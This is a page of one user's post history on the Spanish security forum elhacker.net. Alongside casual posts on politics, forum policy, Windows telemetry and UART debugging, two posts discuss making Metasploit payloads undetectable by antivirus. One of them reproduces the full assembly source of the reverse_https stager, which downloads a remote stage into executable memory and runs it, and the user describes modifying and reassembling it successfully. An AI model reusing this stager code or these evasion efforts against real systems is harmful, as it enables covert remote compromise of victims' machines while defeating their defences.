elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18
131  Seguridad Informática / Análisis y Diseño de Malware / Re: LarryLurexRAT v0.3 en: 16 Enero 2023, 00:49 am
Hacia tiempo que no veia artilugios nuevos  : D
132  Foros Generales / Foro Libre / Post de agradecimiento en: 16 Enero 2023, 00:12 am
Hola,

Quise hacer este post desde el desinteres para agradecer a esta comunidad por el trabajo que aqui se hace, conciente de que todo tiene su bien y su mal.

Es todo.

Gracias.

Nota: Seria de lo mas bajo hacer un post asi con la intencion de obtener algun tipo de validacion. Aunque entiendo que es dificil incluso para mi que estoy en este momento manifestandolo, encontrar sentimientos de agradecimiento a las cosas buenas (o malas) que existen. Sin un motivo de fecha especial o de busqueda alguna simplemente la de expresar el agradecimiento de la voluntad de una comunidad de personas a ayudar a otras, pues eso es lo que somos y lo que nos eleva.

PD: No estoy borracho  :rolleyes: :rolleyes: :rolleyes: (broma)
133  Seguridad Informática / Análisis y Diseño de Malware / [MSF] (Para terminar) ¿Es menos detectable el stage que el stager? en: 16 Enero 2023, 00:09 am
Hola,

Queria tener un contacto sutil con Metasploit pero creo que sera mas que sutil. Sin embargo esto es lo ultimo que me gustaria preguntar al menos en este comienzo.

Logre manipular los shellcodes de Metasploit. Pero ahora me surge la pregunta:

Contexto: antes de dedicarme a modificar el ensamblador de las shellcodes, intente cifrar el shellcode antes de ser ejecutado. Tuve exito pero solo con analisis estaticos. El analisis de comportamiento del antivirus aun lo detectaba. Asi que ahora estoy en la tarea de modificar el shellcode por completo.

Cuando cifre el shellcode, una vez ejecutandose en memoria el antivirus detecto el stager por comportamiento. ¿Eso quiere decir que si modifico el stager para que sea indetectable, una vez el stager descargue el stage de Metasploit y lo ejecute, no va a igualmente el antivirus detectar, no el stager, pero el stage de Metasploit tambien? ¿O no es asi como funciona la cosa? Eso es lo ultimo que me tiene confundido...

¿Lo "Perfecto" seria entonces modificar un single stage entero y no un stager?

Gracias de antemano por su ayuda.
134  Foros Generales / Foro Libre / Derechas e izquierdas en: 15 Enero 2023, 23:01 pm
Pa' arriba, pa' abajo, cha cha cha 🤠

Hola,

Como dice el titulo... derechas e izquierdas.

Cabe mencionar que no tengo nada en contra de las "Elites" sino de como estan establecidas en este mundo.
(Las elites gobiernan, no gestionan. ¿Y pagamos para que sea asi?).

Sin embargo, me parece curioso que las elites siempre utilicen metodos que en el pasado hacian un bien y fueron augurios de esperanza en nuestra hermosa humanidad (que es hermosa).

El concepto de izquierdas y derechas en politica me parece un ejemplo de esto.

Cabe mencionar tambien que con este post tengo la intencion de unir y no de hacer controversia y dividir.

Volviendo a los metodos pasados... Para quien no lo sepa, el tema de izquierdas y derechas viene de la revolucion francesa, y representa a la izquierda como el progreso (progreso no necesariamente beneficioso, ya que tambien se puede progresar hacia el abismo), y a la derecha con la conservacion (tambien puede ser la conservacion del abismo).

Queria hacer conciencia y llamar a la reflexion de como estos terminos se utilizan para poder categorizar a un pueblo y asi dividirlo en partes que sean mas, precisamente, "categorizables".

Se ve en el pais en el que vivo actualmente, como en la clase politica utilizan este metodo para actuar a voluntad de la clase en si y no del pueblo, porque el pueblo no esta unido.

Lo que vengo a preguntar es:

¿Eres de izquierdas o de derechas?
¿Por que?
¿Estarian tus ideologias en orden si no fuera porque te consideras como tal?

IMPORTANTE

Ignorare totalmente y llamo a ignorar cualquier comentario o insinuacion al irrespeto o a la ironia.

Si no eres capaz de aceptar la ideologia del otro, ¿Como esperas que el otro acepte la tuya?
Un soldado ve a su enemigo y se dice a si mismo, "No quiero acabar con su vida, pero el quiere acabar con la mia". En seguida jala el gatillo.

Un ejemplo de un mensaje ironico podria ser:

Por supuesto que soy de izquierdas/derechas. Ni que fuera tonto.

En el terreno ideologico es comun encontrar fanaticos, y la unica solucion al fanatismo es el respeto. El respeto a lo ajeno y principalmente el respeto a la realidad, que en cualquier momento puede ser diferente a nuestras mas intimas creencias (y deseos)...
135  Foros Generales / Foro Libre / Re: Amenaza de Rusia a Japón en: 15 Enero 2023, 22:38 pm
La primera victima: La "informacion descentralizada" (eufemismo)
136  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Borrar temas en: 15 Enero 2023, 22:17 pm
Respecto al tema de la mejor politica de eliminacion de posts, yo creo que los problemas que se presentan son:

- Un usuario puede eliminar el contenido de un post, lo cual es tecnicamente eliminar el post; sin embargo no puede efectivamente borrar el post en si. Supongo que se mantiene un log del contenido de los posts en el sistema del foro, y por eso da igual se que borren los contenidos, pero en ese caso quedamos en la misma (no es mejor dejar el post vacio en el foro).
- Un usuario puede eliminar el contenido cuando le han dado respuestas valiosas, dañando el contenido de la informacion.

Hay una forma en la que esto se puede solucionar definitivamente y creo que es sujeta a comparacion con la bastante ingeniosa idea planteada por el compañero Daniel:

En vez de dar un maximo de tiempo para eliminar los posts, seria mejor no poder eliminar un post que tiene una respuesta. De esta forma, un post vacio puede ser eliminado y tiene sentido mientras esta vacio. De otro modo, en el caso de haber tenido una respuesta, un post no deberia poder ni eliminarse ni modificarse.

¿Que tal eso?
137  Foros Generales / Foro Libre / Re: Tengo una serie de dudas sobre los dominios y las paginas webs en: 15 Enero 2023, 00:48 am
Hola, buenas comunidad, tengo una serie de dudas ya que no hace mucho me he comprado un dominio y necesito algo de consejo a la hora de como empezar con todo este tema, ya sea un tutorial o algo parecido me vendría muy bien.
Estoy tratando de crear algo como este foro pero con un enfoque muy distinto. Ya he encontrado un hosting gratis el cual es 000webhost.com y en algun momento lo pagaré pero por ahora lo voy a intentar manejar así.
Gracias por el tiempo!

Hola : D

Deberias ser mas especifico. Creo que no se entiende exactamente que tipo de consejo o ayuda estas buscando.
138  Sistemas Operativos / Windows / ¿Que informacion envia Windows? en: 15 Enero 2023, 00:35 am
Me pongo un poco paranoico a veces.

¿Cuales son los datos "Required-only" que envia Windows a Microsoft cuando seleccionas que datos de "Diagnostico" (Todos sabemos que de diagnostico no tienen nada) queremos que Win10/11 envie a Microsoft?

¿Envia tus archivos, tus cookies, configuraciones, fondos de pantalla...? ¿Que envia?

Solo espero que no envie mi historial 😳

No vayan a encontrar mi receta favorita de pasta con tomate.  :silbar:

Saludos.  ;D



PD: Descargue el visor de datos de diagnostico y no encontre que enviara nada interesante mas alla de comportamientos del svchost.exe. No se hasta donde pueda llegar eso.
139  Seguridad Informática / Análisis y Diseño de Malware / Re: [MSF] Modificar un shellcode en: 15 Enero 2023, 00:28 am
BloodSharp, gracias por responder.

ANTES DE CONTINUAR, LEER LO QUE PUSE DE ULTIMO (BAJAR)

El problema que hallo con ese metodo, es que no se como aplicarlo a la shellcode de Metasploit, porque no se en donde la suite mete a lo que le llama LHOST y LPORT. No veo ningun espacio.

Esta es la shellcode de reverse_https (stager, de arquitectura x86):

Código
  1. ;-----------------------------------------------------------------------------;
  2. ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
  3. ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
  4. ; Version: 1.0 (24 July 2009)
  5. ; Size: 274 bytes
  6. ; Build: >build.py stager_reverse_tcp_nx
  7. ;-----------------------------------------------------------------------------;
  8.  
  9. [BITS 32]
  10. [ORG 0]
  11.  
  12.  cld                    ; Clear the direction flag.
  13.  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
  14. %include "./src/block/block_api.asm"
  15. start:                   ;
  16.  pop ebp                ; pop off the address of 'api_call' for calling later.
  17. %define ENABLE_SSL 1
  18. %include "./src/block/block_reverse_http.asm"
  19.  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
  20.  

./src/block/block_api.asm:

Código
  1. ;-----------------------------------------------------------------------------;
  2. ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
  3. ; Compatible: NT4 and newer
  4. ; Architecture: x86
  5. ; Size: 140 bytes
  6. ;-----------------------------------------------------------------------------;
  7.  
  8. [BITS 32]
  9.  
  10. ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
  11. ; Output: The return value from the API call will be in EAX.
  12. ; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
  13. ; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
  14. ; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
  15. ; Note: This function is unable to call forwarded exports.
  16.  
  17. api_call:
  18.  pushad                     ; We preserve all the registers for the caller, bar EAX and ECX.
  19.  mov ebp, esp               ; Create a new stack frame
  20.  xor edx, edx               ; Zero EDX
  21.  mov edx, [fs:edx+0x30]     ; Get a pointer to the PEB
  22.  mov edx, [edx+0xc]         ; Get PEB->Ldr
  23.  mov edx, [edx+0x14]        ; Get the first module from the InMemoryOrder module list
  24. next_mod:                    ;
  25.  mov esi, [edx+0x28]        ; Get pointer to modules name (unicode string)
  26.  movzx ecx, word [edx+0x26] ; Set ECX to the length we want to check
  27.  xor edi, edi               ; Clear EDI which will store the hash of the module name
  28. loop_modname:                ;
  29.  xor eax, eax               ; Clear EAX
  30.  lodsb                      ; Read in the next byte of the name
  31.  cmp al, 'a'                ; Some versions of Windows use lower case module names
  32.  jl not_lowercase           ;
  33.  sub al, 0x20               ; If so normalise to uppercase
  34. not_lowercase:               ;
  35.  ror edi, 0xd               ; Rotate right our hash value
  36.  add edi, eax               ; Add the next byte of the name
  37.  dec ecx
  38.  jnz loop_modname           ; Loop until we have read enough
  39.  ; We now have the module hash computed
  40.  push edx                   ; Save the current position in the module list for later
  41.  push edi                   ; Save the current module hash for later
  42.  ; Proceed to iterate the export address table,
  43.  mov edx, [edx+0x10]        ; Get this modules base address
  44.  mov eax, [edx+0x3c]        ; Get PE header
  45.  add eax, edx               ; Add the modules base address
  46.  mov eax, [eax+0x78]        ; Get export tables RVA
  47.  test eax, eax              ; Test if no export address table is present
  48.  jz get_next_mod1           ; If no EAT present, process the next module
  49.  add eax, edx               ; Add the modules base address
  50.  push eax                   ; Save the current modules EAT
  51.  mov ecx, [eax+0x18]        ; Get the number of function names
  52.  mov ebx, [eax+0x20]        ; Get the rva of the function names
  53.  add ebx, edx               ; Add the modules base address
  54.  ; Computing the module hash + function hash
  55. get_next_func:               ;
  56.  test ecx, ecx              ; Changed from jecxz to accomodate the larger offset produced by random jmps below
  57.  jz get_next_mod            ; When we reach the start of the EAT (we search backwards), process the next module
  58.  dec ecx                    ; Decrement the function name counter
  59.  mov esi, [ebx+ecx*4]       ; Get rva of next module name
  60.  add esi, edx               ; Add the modules base address
  61.  xor edi, edi               ; Clear EDI which will store the hash of the function name
  62.  ; And compare it to the one we want
  63. loop_funcname:               ;
  64.  xor eax, eax               ; Clear EAX
  65.  lodsb                      ; Read in the next byte of the ASCII function name
  66.  ror edi, 0xd               ; Rotate right our hash value
  67.  add edi, eax               ; Add the next byte of the name
  68.  cmp al, ah                 ; Compare AL (the next byte from the name) to AH (null)
  69.  jne loop_funcname          ; If we have not reached the null terminator, continue
  70.  add edi, [ebp-8]           ; Add the current module hash to the function hash
  71.  cmp edi, [ebp+0x24]        ; Compare the hash to the one we are searchnig for
  72.  jnz get_next_func          ; Go compute the next function hash if we have not found it
  73.  ; If found, fix up stack, call the function and then value else compute the next one...
  74.  pop eax                    ; Restore the current modules EAT
  75.  mov ebx, [eax+0x24]        ; Get the ordinal table rva
  76.  add ebx, edx               ; Add the modules base address
  77.  mov cx, [ebx+2*ecx]        ; Get the desired functions ordinal
  78.  mov ebx, [eax+0x1c]        ; Get the function addresses table rva
  79.  add ebx, edx               ; Add the modules base address
  80.  mov eax, [ebx+4*ecx]       ; Get the desired functions RVA
  81.  add eax, edx               ; Add the modules base address to get the functions actual VA
  82.  ; We now fix up the stack and perform the call to the desired function...
  83. finish:
  84.  mov [esp+0x24], eax        ; Overwrite the old EAX value with the desired api address for the upcoming popad
  85.  pop ebx                    ; Clear off the current modules hash
  86.  pop ebx                    ; Clear off the current position in the module list
  87.  popad                      ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
  88.  pop ecx                    ; Pop off the origional return address our caller will have pushed
  89.  pop edx                    ; Pop off the hash value our caller will have pushed
  90.  push ecx                   ; Push back the correct return value
  91.  jmp eax                    ; Jump into the required function
  92.  ; We now automagically return to the correct caller...
  93. get_next_mod:                ;
  94.  pop eax                    ; Pop off the current (now the previous) modules EAT
  95. get_next_mod1:               ;
  96.  pop edi                    ; Pop off the current (now the previous) modules hash
  97.  pop edx                    ; Restore our position in the module list
  98.  mov edx, [edx]             ; Get the next module
  99.  jmp next_mod               ; Process this module

./src/block/block_reverse_http.asm:

Código
  1. ;-----------------------------------------------------------------------------;
  2. ; Author: HD Moore
  3. ; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
  4. ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
  5. ; Version: 1.0
  6. ;-----------------------------------------------------------------------------;
  7. [BITS 32]
  8.  
  9. %ifdef ENABLE_SSL
  10. %define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
  11.  ;0x80000000 | ; INTERNET_FLAG_RELOAD
  12.  ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
  13.  ;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
  14.  ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
  15.  ;0x00000200 | ; INTERNET_FLAG_NO_UI
  16.  ;0x00800000 | ; INTERNET_FLAG_SECURE
  17.  ;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
  18.  ;0x00001000   ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
  19. %else
  20. %define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
  21.  ;0x80000000 | ; INTERNET_FLAG_RELOAD
  22.  ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
  23.  ;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
  24.  ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
  25.  ;0x00000200   ; INTERNET_FLAG_NO_UI
  26. %endif
  27.  
  28. ; Input: EBP must be the address of 'api_call'.
  29. ; Output: EDI will be the socket for the connection to the server
  30. ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
  31. load_wininet:
  32.  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
  33.  push 0x696e6977        ; ...
  34.  push esp               ; Push a pointer to the "wininet" string on the stack.
  35.  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
  36.  call ebp               ; LoadLibraryA( "wininet" )
  37.  
  38. set_retry:
  39.  push byte 8           ; retry 8 times should be enough
  40.  pop edi
  41.  xor ebx, ebx           ; push 8 zeros ([1]-[8])
  42.  mov ecx, edi
  43. push_zeros:
  44.  push ebx
  45.  loop push_zeros
  46.  
  47. internetopen:
  48.                         ; DWORD dwFlags [1]
  49.                         ; LPCTSTR lpszProxyBypass (NULL) [2]
  50.                         ; LPCTSTR lpszProxyName (NULL) [3]
  51.                         ; DWORD dwAccessType (PRECONFIG = 0) [4]
  52.                         ; LPCTSTR lpszAgent (NULL) [5]
  53.  push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
  54.  call ebp
  55.  
  56. internetconnect:
  57.                         ; DWORD_PTR dwContext (NULL) [6]
  58.                         ; dwFlags [7]
  59.  push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
  60.  push ebx               ; password (NULL)
  61.  push ebx               ; username (NULL)
  62.  push dword 4444        ; PORT
  63.  call got_server_uri    ; double call to get pointer for both server_uri and
  64. server_uri:              ;  server_host; server_uri is saved in EDI for later
  65.  db "/12345", 0x00
  66. got_server_host:
  67.  push eax               ; HINTERNET hInternet
  68.  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
  69.  call ebp
  70.  
  71. httpopenrequest:
  72.                         ; dwContext (NULL) [8]
  73.  push HTTP_OPEN_FLAGS   ; dwFlags
  74.  push ebx               ; accept types
  75.  push ebx               ; referrer
  76.  push ebx               ; version
  77.  push edi               ; server URI
  78.  push ebx               ; method
  79.  push eax               ; hConnection
  80.  push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
  81.  call ebp
  82.  xchg esi, eax          ; save hHttpRequest in esi
  83.  
  84. send_request:
  85.  
  86. %ifdef ENABLE_SSL
  87. ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
  88. set_security_options:
  89.  push 0x00003380
  90.    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
  91.    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
  92.    ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
  93.    ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
  94.    ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
  95.  mov eax, esp
  96.  push byte 4            ; sizeof(dwFlags)
  97.  push eax               ; &dwFlags
  98.  push byte 31           ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
  99.  push esi               ; hHttpRequest
  100.  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
  101.  call ebp
  102.  
  103. %endif
  104.  
  105. httpsendrequest:
  106.  push ebx               ; lpOptional length (0)
  107.  push ebx               ; lpOptional (NULL)
  108.  push ebx               ; dwHeadersLength (0)
  109.  push ebx               ; lpszHeaders (NULL)
  110.  push esi               ; hHttpRequest
  111.  push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
  112.  call ebp
  113.  test eax,eax
  114.  jnz short allocate_memory
  115.  
  116. try_it_again:
  117.  dec edi
  118.  jnz send_request
  119.  
  120. ; if we didn't allocate before running out of retries, fall through to
  121. ; failure
  122.  
  123. failure:
  124.  push 0x56A2B5F0        ; hardcoded to exitprocess for size
  125.  call ebp
  126.  
  127. allocate_memory:
  128.  push byte 0x40         ; PAGE_EXECUTE_READWRITE
  129.  push 0x1000            ; MEM_COMMIT
  130.  push 0x00400000        ; Stage allocation (8Mb ought to do us)
  131.  push ebx               ; NULL as we dont care where the allocation is
  132.  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
  133.  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
  134.  
  135. download_prep:
  136.  xchg eax, ebx          ; place the allocated base address in ebx
  137.  push ebx               ; store a copy of the stage base address on the stack
  138.  push ebx               ; temporary storage for bytes read count
  139.  mov edi, esp           ; &bytesRead
  140.  
  141. download_more:
  142.  push edi               ; &bytesRead
  143.  push 8192              ; read length
  144.  push ebx               ; buffer
  145.  push esi               ; hRequest
  146.  push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
  147.  call ebp
  148.  
  149.  test eax,eax           ; download failed? (optional?)
  150.  jz failure
  151.  
  152.  mov eax, [edi]
  153.  add ebx, eax           ; buffer += bytes_received
  154.  
  155.  test eax,eax           ; optional?
  156.  jnz download_more      ; continue until it returns 0
  157.  pop eax                ; clear the temporary storage
  158.  
  159. execute_stage:
  160.  ret                    ; dive into the stored stage address
  161.  
  162. got_server_uri:
  163.  pop edi
  164.  call got_server_host
  165.  
  166. server_host:
  167.  

Intentando """"adivinar""""":

LHOST me parece que lo define en la linea:

Código
  1. db "/12345", 0x00

LPORT me parece que lo define en la linea:

Código
  1. push dword 4444

Supongo, estoy casi seguro, de que es asi.

La pregunta es:  ¿Es asi? xdddddd

Y si es asi, ¿Como lo ensamblo a binario (o elf para poder extraer el binario, aunque tomando en cuenta que block_api.asm toma acceso al TEB, no se si sea adecuado ensamblar a elf ya que el TEB es una estructura especifica de WinNT). No se que pienses de eso, BloodSharp.



No me fije en que ahi decia URI.

Ya logre modificarlo y ensamblarlo con exito. Funciona bien. Gracias por su ayuda.

Para el que quiera saber:

Los shellcodes en codigo fuente no forman parte integral de MSF.

Lo unico que se puede hacer es entender que hace el codigo y modificarlo a partir de eso, como decia MCKSys Argentina.

Los codigos fuente estan en formato NASM.

Un saludo.
140  Programación / Ingeniería Inversa / Re: Como calcular el baud rate de un UART en: 14 Enero 2023, 19:19 pm
Hola,

Ya lo tengo de vuelta,

IMPORTANTE: PERDON POR EL TAMAñO DE LAS IMAGENES, NO SE COMO AJUSTARLO.

Aqui las imagenes, rub'n:

PUERTO UART


MOTHERBOARD


BASTIDOR


MOD: Imagenes adaptadas a lo permitido
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines